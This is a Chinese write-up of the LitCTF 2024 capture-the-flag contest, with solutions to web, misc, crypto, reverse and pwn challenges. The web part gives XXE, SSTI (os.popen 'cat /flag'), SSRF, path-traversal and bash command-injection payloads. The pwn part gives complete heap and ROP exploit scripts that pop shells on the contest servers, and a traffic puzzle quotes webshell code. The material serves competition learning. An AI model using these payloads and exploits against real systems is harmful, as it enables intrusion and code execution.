-
LitCTF2024部分wp
litctf wp
第一次ak了web和misc,非常激动,感谢lictf给我这个机会
最终成果
全靠队里的密码逆向✌带飞。一个人就砍了近一半的分数
这里是我们队的wp
web
exx
题目名反过来就是xxe,考察xxe,查看登录的数据包
发现传的就是xml数据,没过滤啥,基础的payload就出了
import requests port=28926 username='&xxe;' data=f""" ]>123456 """ url=f'http://node2.anna.nssctf.cn:{port}/doLogin.php' res=requests.post(url=url,data=data) print(res.text)
一个池子?
打开环境,看到回声两个字,就猜到是ssti,输入{{3*5}},
果然就是,本来还想fuzz一下黑名单,联想到xxe没有过滤,用基础payload也是一下就出了
{{lipsum.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}SAS
没啥好说,按照他给的代码,写出base64后的对应的序列化数据即可,考反序列化至少也得搞个pop链吧。。。
exp
class User { public $username='admin'; public $password='secure_password'; } echo base64_encode(serialize(new User()));浏览器也能套娃?
提示输入url,输入个百度的网址,回显了个百度的页面,就是考ssrf,也是没啥过滤,file协议就出了
file:///flag背景查看器
一开始有个文件包含的提示代码,搞得我以为传url参数,结果没反应,后面发现有个改变主题的按钮,按下后有发送请求
所以参数是这个theme,也是没啥过滤,首页的代码提示是唬人的,直接目录穿越包含根目录的flag即可
exp
import requests url='http://node1.anna.nssctf.cn:28117/' file='../../../../../flag' data={'theme':file} res=requests.post(url=url,data=data) print(res.text)
百万美元
源码
error_reporting(0); $a = $_GET['a']; $b = $_GET['b']; $c = $_GET['c']; if ($a !== $b && md5($a) == md5($b)) { if (!is_numeric($c) && $c > 2024) { echo "好康的"; } else { die("干巴爹干巴爹先辈~"); } } else { die("开胃小菜))"); }a 和b很明显传个md5是0e的就行,c传2025a即可,字符串和数字比较会转为数字,2025a转为2025
payload
?a=MMHUWUV&b=MAUXXQC&c=2025a来到dollar.php
?php //flag in 12.php error_reporting(0); if(isset($_GET['x'])){ $x = $_GET['x']; if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){ system("cat ".$x.".php"); } }else{ highlight_file(__FILE__); } ?>ban掉了数字字母,还要构造出12,利用
$(())构造出来0 ,取反一下$((~$(())))构造-1,然后把后面多个$((~$(())))像字符串一样拼在一起,shell执行就做减法运算,减到-13,再取反到12即可,
具体原理可看探机的bash-fuck项目
https://github.com/ProbiusOfficial/bashFuck?tab=readme-ov-file
还有这个大佬的文章也可以看一下
payload
?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
misc
贪恋每分每秒
提示很明显了,laosebi 就是lsb,跑个随波逐流即可出flag
你说的对,但
一开始解压出来的二维码,扫一下转到了云原神,
发现二维码图片里有藏压缩包,foremost提取出来,解压一下发现是一个二维码被拆成了4个部分,还是用随波逐流,方形合并一下得到完整二维码图片,
扫一下就出了flag
LitCTF{Genshin_St@rt!!}原铁启动
给了个图片
身为前原神和现星铁玩家,一下字认出了这是原神和星铁里的文字,网上找个对照表就可以出flag
原神:【图研所】提瓦特现行文字对照表-原神社区-米游社 (miyoushe.com) 通用文
星铁:【1.0版本考据】历时两个半月!铁道文字翻译!-原神社区-米游社 (miyoushe.com),
记得换flag头和转小写
LitCTF{good_gamer}Everywhere we go
就给了一个wav,播放时感觉没啥问题,但我舍友听到了说感觉很奇怪,和原曲差别有点大,可能里面还是藏了东西,尝试用advacity,把采样率改小一点,这里用了1500,打开频谱图,就能看到中间有个flag
盯帧珍珠
乍一看是个丁真图片,一打开马上又变成其他的,用stegsolve把每一帧固定住,每帧找一下就能出flag
flag
LitCTF{You_are_really_staring_at_frames!}舔到最后应有尽有
一打开,是一大堆base64字符串,感觉是base64隐写,puzzlesolver一把梭即可
LitCTF{TanJi_j1e_jie_n1_dAi_w0_z0u_b_}太关键了
根据题目名,还有压缩包里的文件名,猜出这是关键词加密,题目提示某些字符频率很高,对keyword.txt里的东西进行词频分析即可出关键词
bingo
然后关键词解密即可
LITCTF{i_miss_you_boss}女装照流量
流量分析,因为只会看http,所以直接看
看到跟/uplaod/ma.php有很多交互,看看在干什么,找了最后一个来看
请求是一段很长的php代码,像是蚁剑流量,应答很明显是一个压缩包数据,里面有flag.php,把php代码url解码,格式化一下,得到很长一串,关键部分如下
$F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($_POST["p2a4445380b252"]) : $_POST["p2a4445380b252"], 2)); $fp = @fopen($F, "r"); if (@fgetc($fp)) { @fclose($fp); @readfile($F); } else { echo("ERROR:// Can Not Read"); }$F应该就是一个文件的路径,然后readfile读取,根据响应包的内容,这应该是读取压缩包内容的,于是把响应包压缩包内容导出来,解压发现需要密码,
然后就往上继续查看ma.php的请求和应答,看到这个时发现
关键词,adding ,stored,明显是压缩flag.php的命令的回显,所以请求的包一定是压缩的命令,其中应该有密码
于是,把上一个请求的9783流量包的php代码导出来,格式化,得到关键部分如下
$p = base64_decode(substr($_POST["da8af99c22690c"], 2)); $s = base64_decode(substr($_POST["j6d5aaa1b7e5ac"], 2));然后代码中运行rce用到了p,post的
da8af99c22690c参数应该就是命令,解码一下
得到密码,解压即可得到flag
the love
解压有个图片和wav,wav听起来挺正常的
发现图片中有一个压缩包,分离出来,继续解压发现是真加密,需要密码,一开始爆破了全数字失败,然后010查看图片时发现
很明显是掩码攻击,apchr跑一下就出了,中间缺失的是202405
压缩包解压后有个假flag,还有一个password.txt,里面的两遍base64后,是
带密钥的音频隐写,尝试deepsound工具,就出了flag
Crypto
small_e
低指数攻击,n很大,直接开三次方即可
from Crypto.Util.number import * import math c_list = [...] def cubic_root_to_ascii(numbers): ascii_chars = [] for num in numbers: for i in range(0, 200): if i**3 == num: ascii_chars.append(chr(i)) return ascii_chars ascii_result = cubic_root_to_ascii(c_list) print("".join(ascii_result))small_e_plus
指数依旧比较小,而且可以猜测前几位明文是
LitCTF
爆破出指数,然后解密即可n = 26287684934288536371438030224508784042871268975402791015134838900290249602701092702492594931306572692868654436714501196060619149020850402317982203575250568283872182497606239389480186694649979877566740647822434500023605871516831662099415987589808614777313595453727243531121031390104059097782466650186291076316486240197369759537327997880644540629964227584070506981319936888159712058406052247256554081989035415864476278146328967410452695134756792942103209740186339835071828587981271027235499355298543650516643100665039796305276163706693873611519506528344413021878980171629732211592839945004800782325172828561339662590291 c_list = [...] c1 = ord("L") c = 2206795524649235905421691489826312664535869158473992241382107452229902627430789178221234450699214518235612692491501082306158268745610575202210170312762929300421312081998256557805289595256913161318967687803957784191522197708618872099119883772100567610799038030170491575261415069363292331223848994909959222662307903914818692008641789258455591462146141825906954662346647872459477376830019604449386735009274664469596162731339288162705222622464022019805917855614180415135305122287341306358535204977475464107550060171378721195970927993762052901722822033817371589592984818877687488499315074761849162622037910992107211284008 for i in range(1000, 2000): if ((c1**i) % n) == c: print(i) break e = 1924 ascii_chars = [] for num in c_list: for i in range(0, 200): if ((i**e) % n) == num: ascii_chars.append(chr(i)) continue print("".join(ascii_chars))真签到
依旧是爆破指数,然后解密
c1 = ord("L") c = 4124398080749553074619843072966405052653858760437326718059791703345965920503569739252697039258403095781261373084359291436131778873009458422798167842256401087702314540530419434366776728534830888673974354635857270349385440098865230210094489169761588857916363734220665484295067349289289937219722492065728599463 n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891 for i in range(2, 10**8): if pow(c1, i, n) == c: print(i)这里得到 e = 9897777
n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891 e = 9897777 c = [...] ascii_chars = [] for num in c: for i in range(0, 200): if pow(i, e, n) == num: ascii_chars.append(chr(i)) continue print("".join(ascii_chars))polynomlal
直接算出pqr,解就完事了
from sympy import symbols, Eq, solve from Crypto.Util.number import inverse, long_to_bytes Polynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142 Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760 Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832 p, q, r = symbols("p q r", integer=True) eq1 = Eq(p**2 + q, Polynomial1) eq2 = Eq(q**2 + r, Polynomial2) eq3 = Eq(r**2 + p, Polynomial3) solutions = solve((eq1, eq2, eq3), (p, q, r)) if solutions: p, q, r = solutions[0] print(p) print(q) print(r) import libnum import gmpy2 e = 65537 p = 7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631 q = 13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981 r = 9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399 n = p * q * r c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900 phi_n = (p - 1) * (q - 1) * (r - 1) d = gmpy2.invert(e, phi_n) m = pow(c, d, n) print(libnum.n2s(int(m)))polynomial_plus
升级版多项式,本来是直接用python解多项式方程的,但是跑了半天没跑出来
后来想到用二分查找 k,每次计算区间中间的数与 n 比较,判断是左右哪个区间,一下搞定from Crypto.Util.number import * def calculate_p_q(k): p = k**10 + 22 * k**8 + 53 * k**6 - 22 * k**4 - 39 * k**2 + 114514 q = k**9 + 10 * k**7 - 13 * k**6 - 2 * k**4 + 111 * k**2 + 1919810 return p, q def binary_search(n): low = 0 high = 2**65 while low <= high: mid = (low + high) // 2 p, q = calculate_p_q(mid) if p * q == n: return mid elif p * q < n: low = mid + 1 else: high = mid - 1 return None e = 65537 n = 343424787688946710828788193478518340184635630498236346907606509763011890082198311173501834898393322176325060349656021994088578448585570427399686920253145504431065451412326430233084073651599248661762036671841142048573051549474182586297565046285161375600990596119448538118327240405957845178956427810835797220204485242640945891970398041508724313442375608608662117158013 c = 300097152084696274516003269451037367405899874736667089358316145472977115856239312841307278390995620995063953407731245808077915106161525019835875978698148238617148929170257141762407514139479267867121064342168993486529889088067645866930029787500052390195406519896658384623575160091828173111087120708969655686251340535134778177193882787257773427670338018428731395437974 k = binary_search(n) p, q = calculate_p_q(k) d = inverse(e, (p - 1) * (q - 1)) m = pow(c, d, n) print(long_to_bytes(m))真easyRSA
刚开始看到题目中有
print(p) print(c),但是输出里没有 p,却有 c1 c2 想不明白
后面重新试着解了一下,原来是有两段from Crypto.Util.number import * import gmpy2 n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521 p = gmpy2.iroot(n, 4)[0] q = p**3 e = 65537 d = inverse(e, p**3 * (p - 1)) c1 = 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560 c2 = 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219 print(long_to_bytes(pow(c1, d, n))) # LitCTF{HeRe_1s_Weak_F1aG}hahahaha_____hint_is_93492332457019255141294502555555489582661562346262162342211605562996217352449 q = 93492332457019255141294502555555489582661562346262162342211605562996217352449 e = 65537 n = p * q d = inverse(e, (p - 1) * (q - 1)) print(long_to_bytes(pow(c2, d, n))) # LitCTF{R1ght_Answ3r!}common_primes
n1,n2 有公因数 p,得到 p 求解即可
from Crypto.Util.number import * e = 65537 n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769 n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573 c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252 c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420 p = GCD(n1, n2) q = n1 // p phi_n = (p - 1) * (q - 1) d = inverse(e, phi_n) m = pow(c1, d, n1) print(long_to_bytes(m))common_primes_plus
复杂一点的式子,观察一下发现 hint1,hint2 依旧有公因数 p
from Crypto.Util.number import * n1 = 72619153900682160072296441595808393095979917106156741746523649725579328293061366133340736822282117284050717527134297532031234706715551253283030119063143935874516054785948327252045453986903379262257406260016876625891582923191913450785482873961282498295762698500898694660964018533698142756095427829906473038053 hint1 = 115150932086321440397498980975794957800400136337062771258224890596200580556053305338941267789684878816176014493153795643655219028833232337281425177163963414534998897852644398384446019097451620742463880027107068960452304016955877225140421899265978792650445328111566277376529454404089066088845864500514742797060500618255170627 hint2 = 166820160267525807953634213157298160399912450930658918773153592459310847514047652216110562360456335336533080444219104489314586122760398361430693763814336759476811490524054588094610387417965626546375189720748660483054863693527537614055954695966458622029711055735399842018236940424665041143785192280089418185085532002136215976 c = 28378912671104261862184597375842174085651209464660064937481961814538145807266472966765374317717522401362019901110151858589886717440587644003368826809403188935808872400614919296641885383025657934630410406898092262104442977722339379234085663757182028529198392480656965957860644395092769333414671609962801212632 e = 65537 p = GCD(hint1, hint2) q = n1 // p d = inverse(e, (p - 1) * (q - 1)) m = pow(c, d, n1) print(long_to_bytes(m))CRT
观察了一下,发现 c_list 中的值都是一样的,说明 e=10 指数较小,直接求 c 的 10 次方根即可
from Crypto.Util.number import * import gmpy2 c = 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049 m = gmpy2.iroot(c, 10)[0] print(long_to_bytes(m))little_fermat
p,q 相近,求解 n 的平方根,找相近即可
另外 x 是费马小定理的形式,x = q - 1from Crypto.Util.number import * import gmpy2 e = 65537 n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693 c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928 root, remainder = gmpy2.iroot(n, 2) p = 0 q = 0 while True: p = n // root if p * root == n: q = root break root = root - 1 d = inverse(e, (p - 1) * (q - 1)) m = pow(c, d, n) m = m ^ (q - 1) print(long_to_bytes(m))little_fermat_plus
x 变成了 n 倍的 x,爆破一下就行
from Crypto.Util.number import * import gmpy2 e = 65537 n = 169522900072954416356051647146585827691225327527086797334523482640452305793443986277933900273961829438217255938808371865341750200444086653241610669340348513884285892043530862971785487294831341653909852543469963032532560079879299447677636753647721541724969084825510405349373420839032990681851700075554428485967 c = 105943762023156641770119141175498496686312095002592803768522760959533958364969985856505466722378959991757667341747887520146437729810252085791886309974903778546814812093444837674447485802109225767800488527376777153844313243366001288246744190001997192598159277512188417272938455513900277907186067996704043274199 root, remainder = gmpy2.iroot(n, 2) p = 0 q = 0 while True: p = n // root if p * root == n: q = root break root = root - 1 d = inverse(e, (p - 1) * (q - 1)) m = pow(c, d, n) print(m) for i in range(10000): am = m ^ (i * (q - 1)) flag = long_to_bytes(am) if b"LitCTF" in flag: print(flag) breakReverse
编码喵
看到主程序 base64 加密,然后看字符串
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=
经典换表 base64
ezpython
python逆向题,用 pyinstxtractor 反编译,然后高版本的 python 无法用本地的 uncompyle6,上网找了个工具
又是换表base64
8kuWYm=1JiUPs7DT4x+X5tcqZKfGvA0gFLB6y3QbV2rNOlRdMwnEohjzSe9/HIa-
X=3o4hx=0EZwf=mMv13gX=3o4hx=qje2ZjtgZQmEKXZog4==
ezrc4
动态调试得到 key = litctf!
用 python 解密即可,注意字符串的大小端转换def rc4_init(key): s = list(range(256)) j = 0 k = [key[i % len(key)] for i in range(256)] for i in range(256): j = (j + s[i] + k[i]) % 256 s[i], s[j] = s[j], s[i] return s def rc4_crypt(data, key): s = rc4_init(key) i = j = 0 out = bytearray() for byte in data: i = (i + 1) % 256 j = (j + s[i]) % 256 s[i], s[j] = s[j], s[i] t = (s[i] + s[j]) % 256 out.append(byte ^ s[t]) return out key = b"litctf!" data = bytearray( [ 0xD5, 0xB2, 0x7C, 0xDC, 0x90, 0xA2, 0x6E, 0x60, 0x06, 0x13, 0xE4, 0x71, 0x59, 0xB0, 0x90, 0x31, 0xB2, 0xC7, 0x1D, 0xD7, 0x7F, ] ) decrypted_data = rc4_crypt(data, key) print(decrypted_data.decode("utf-8"))得到
LitCTF{rc4_love_nice}Pwn
不得不说,分配的相当清晰,从2.23的fastbin到2.27的tcache bin再到2.31的tcache bin key以及2.35和2.39的IO。从易到难,不过,不得不说,还是警醒我学IO,因为,不会IO,对着例题看了2.35瞪了一下午打不通的眼[躺],对了,加了一道小rop,不过重点在于溢出理解,没有很高的知识要求
heap-2.23
UAF后,可以轻易泄漏出libc基址,然后再通过fastbin attack直接写malloc_hook为one_gadget就行
from pwn import * libc = ELF("./libc.so.6") \# elf = ELF("./heap") \# libc = elf.libc \# io = process("./heap") io = remote("node2.anna.nssctf.cn", 28852) context(arch = 'amd64', os='linux', terminal='kitty') \# context.log_level = 'debug' dbg = lambda: (gdb.attach(io),pause()) lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s)) def choose(choice): io.sendlineafter('>>', str(choice).encode()) def alloc(id, size): choose(1) io.sendlineafter(b'idx?', str(id).encode()) io.sendlineafter(b'size?', str(size).encode()) def delete(id): choose(2) io.sendlineafter(b'idx?', str(id).encode()) def edit(id, content): choose(4) io.sendlineafter(b'idx?', str(id).encode()) io.sendlineafter(b'content :', content) def show(id): choose(3) io.sendlineafter(b'idx?', str(id).encode()) alloc(0, 0x90) alloc(1, 0x10) delete(0) show(0) io.recvuntil(b'content : ') malloc_hook = u64(io.recv(6).ljust(8, b'\x00')) - 88 - 0x10 lg("malloc_hook", malloc_hook) libcbase = malloc_hook - libc.sym['__malloc_hook'] lg("libcbase", libcbase) realloc = libcbase + libc.sym['realloc'] lg("realloc", realloc) l_gadget = [0x4525a, 0xef9f4, 0xf0897] r_gadget = [0x4527a, 0xf03a4, 0xf1247] one_gadget = libcbase + r_gadget[2] lg("one_gadget", one_gadget) alloc(2, 0x68) delete(2) edit(2, p64(malloc_hook - 0x23)) alloc(3, 0x68) alloc(4, 0x68) edit(4, b'A'*0xb + p64(one_gadget) + p64(realloc + 0x8)) alloc(5, 0x68) io.interactive() dbg()heap-2.27
同样的UAF,泄漏后直接tcache double free,写free_hook为system地址,然后free掉包含/bin/sh\x00的堆块就行
from pwn import * libc = ELF("./libc.so.6") \# elf = ELF("./heap") \# libc = elf.libc \# io = process("./heap") io = remote("node1.anna.nssctf.cn", 28709) context(arch = 'amd64', os='linux', terminal='kitty') \# context.log_level = 'debug' dbg = lambda: (gdb.attach(io),pause()) lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s)) def choose(choice): io.sendlineafter('>>', str(choice).encode()) def alloc(id, size): choose(1) io.sendlineafter(b'idx?', str(id).encode()) io.sendlineafter(b'size?', str(size).encode()) def delete(id): choose(2) io.sendlineafter(b'idx?', str(id).encode()) def edit(id, content): choose(4) io.sendlineafter(b'idx?', str(id).encode()) io.sendafter(b'content :', content) def show(id): choose(3) io.sendlineafter(b'idx?', str(id).encode()) alloc(0, 0x410) alloc(1, 0x10) delete(0) show(0) io.recvuntil(b'content : ') libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook'] lg("libcbase", libcbase) free_hook = libcbase + libc.sym['__free_hook'] lg("free_hook", free_hook) l_gadget = [0xe6aee, 0xe6af1, 0xe6af4] r_gadget = [0xe3afe, 0xe3b01, 0xe3b04] one_gadget = libcbase + l_gadget[0] lg("one_gadget", one_gadget) system = libcbase + libc.sym['system'] lg("system", system) alloc(2, 0x18) delete(2) edit(2, p64(free_hook)) alloc(3, 0x18) alloc(4, 0x18) edit(3, b'/bin/sh\x00') edit(4, p64(system)) delete(3) io.interactive() dbg()heap-2.31
UAF再次出击,不仅可以泄漏,还可以清除掉tcache bin检查用的key,然后再次写free_hook(小记一个,2.32才有tcache bin的fd指针加密,我竟然花了十分钟才反应过来,第一个tcache里确实有一个加密用的地址,但是好像没用上,翻笔记才发现2.32才有这机制。。。)
from pwn import * # libc = ELF("./libc.so.6") elf = ELF("./heap") libc = elf.libc io = process("./heap") # io = remote("node1.anna.nssctf.cn", 28144) context(arch = 'amd64', os='linux', terminal='kitty') # context.log_level = 'debug' dbg = lambda: (gdb.attach(io),pause()) lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s)) def choose(choice): io.sendlineafter('>>', str(choice).encode()) def alloc(id, size): choose(1) io.sendlineafter(b'idx?', str(id).encode()) io.sendlineafter(b'size?', str(size).encode()) def delete(id): choose(2) io.sendlineafter(b'idx?', str(id).encode()) def edit(id, content): choose(4) io.sendlineafter(b'idx?', str(id).encode()) io.sendafter(b'content :', content) def show(id): choose(3) io.sendlineafter(b'idx?', str(id).encode()) alloc(0, 0x410) alloc(1, 0x10) delete(0) show(0) io.recvuntil(b'content : ') libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook'] lg("libcbase", libcbase) free_hook = libcbase + libc.sym['__free_hook'] lg("free_hook", free_hook) l_gadget = [0xe6aee, 0xe6af1, 0xe6af4] r_gadget = [0xe3afe, 0xe3b01, 0xe3b04] one_gadget = libcbase + l_gadget[0] lg("one_gadget", one_gadget) system = libcbase + libc.sym['system'] lg("system", system) alloc(2, 0x80) delete(2) delete(2) edit(2, p64(free_hook)) alloc(4, 0x80) alloc(5, 0x80) edit(5, p64(system)) gdb.attach(io) alloc(6, 0x10) edit(6, b'/bin/sh\x00') delete(6) io.interactive() dbg()atm
其实蛮有意思,给了200的溢出距离,但是实际上给了修改函数,3可以增多,2可以减少,不过没用上2,直接不停的给3加0x200(实际上能溢出写进pop_rdi_ret,binsh,ret和system的地址就行了,但是直接就这么写了),只要有了足够长的溢出,就直接执行5泄漏后拿到binsh地址和system地址,然后正常rop,再记一下,有栈平衡问题,会卡住,要加个ret平衡栈,就这样
from pwn import * from LibcSearcher import * # io = process("./app") io = remote("node2.anna.nssctf.cn", 28651) elf = ELF("./app") libc = elf.libc context.terminal = 'kitty' io.sendafter(b'password:', b'A'*0x10) main = elf.sym['main'] asi = 1 while asi: io.sendlineafter(b'4.Exit', b'3') io.sendlineafter(b'Please enter your deposit:', str(0x200).encode()) io.sendlineafter(b'4.Exit', b'1') io.recvuntil(b'Your balance is:') asb = io.recvuntil(b'$', drop='True') if int(asb) > 0x200: asi = 0 print(hex(int(asb))) io.sendlineafter(b'4.Exit', b'5') io.recvuntil(b'gift:') _addr = int(io.recvline()[:-1], 16) print(hex(_addr)) libc = LibcSearcher('printf', _addr) libcbase = _addr - libc.dump('printf') # libcbase = _addr - libc.sym['printf'] print(hex(libcbase)) system = libcbase + libc.dump('system') binsh = libcbase + libc.dump('str_bin_sh') # system = libcbase + libc.sym['system'] # binsh = libcbase + next(libc.search('/bin/sh')) print(hex(system)) print(hex(binsh)) pop_rdi_ret = 0x0000000000401233 io.sendline(b'A'*(0x160+8) + p64(pop_rdi_ret) + p64(binsh) + p64(0x000000000040101a) + p64(system) + p64(main)) # gdb.attach(io) io.sendlineafter(b'4.Exit', b'4') io.interactive() -
相关阅读:
智慧用电解决方案-最新全套文件
【jmeter+ant+jenkins】之搭建 接口自动化测试平台
JAVA轻量级错误码设计最佳实践
驱动开发:内核特征码扫描PE代码段
C++高级 文件和流
C# 一个基于.NET Core3.1的开源项目帮你彻底搞懂WPF框架Prism
四川云汇优想教育咨询有限公司电商服务正规吗
机器学习中的核方法
Ubuntu20和CentOS7:部署NFS(网络文件系统)
宁德时代,冷暖自知口难言
- 原文地址:https://blog.csdn.net/oyf3085227433/article/details/139383544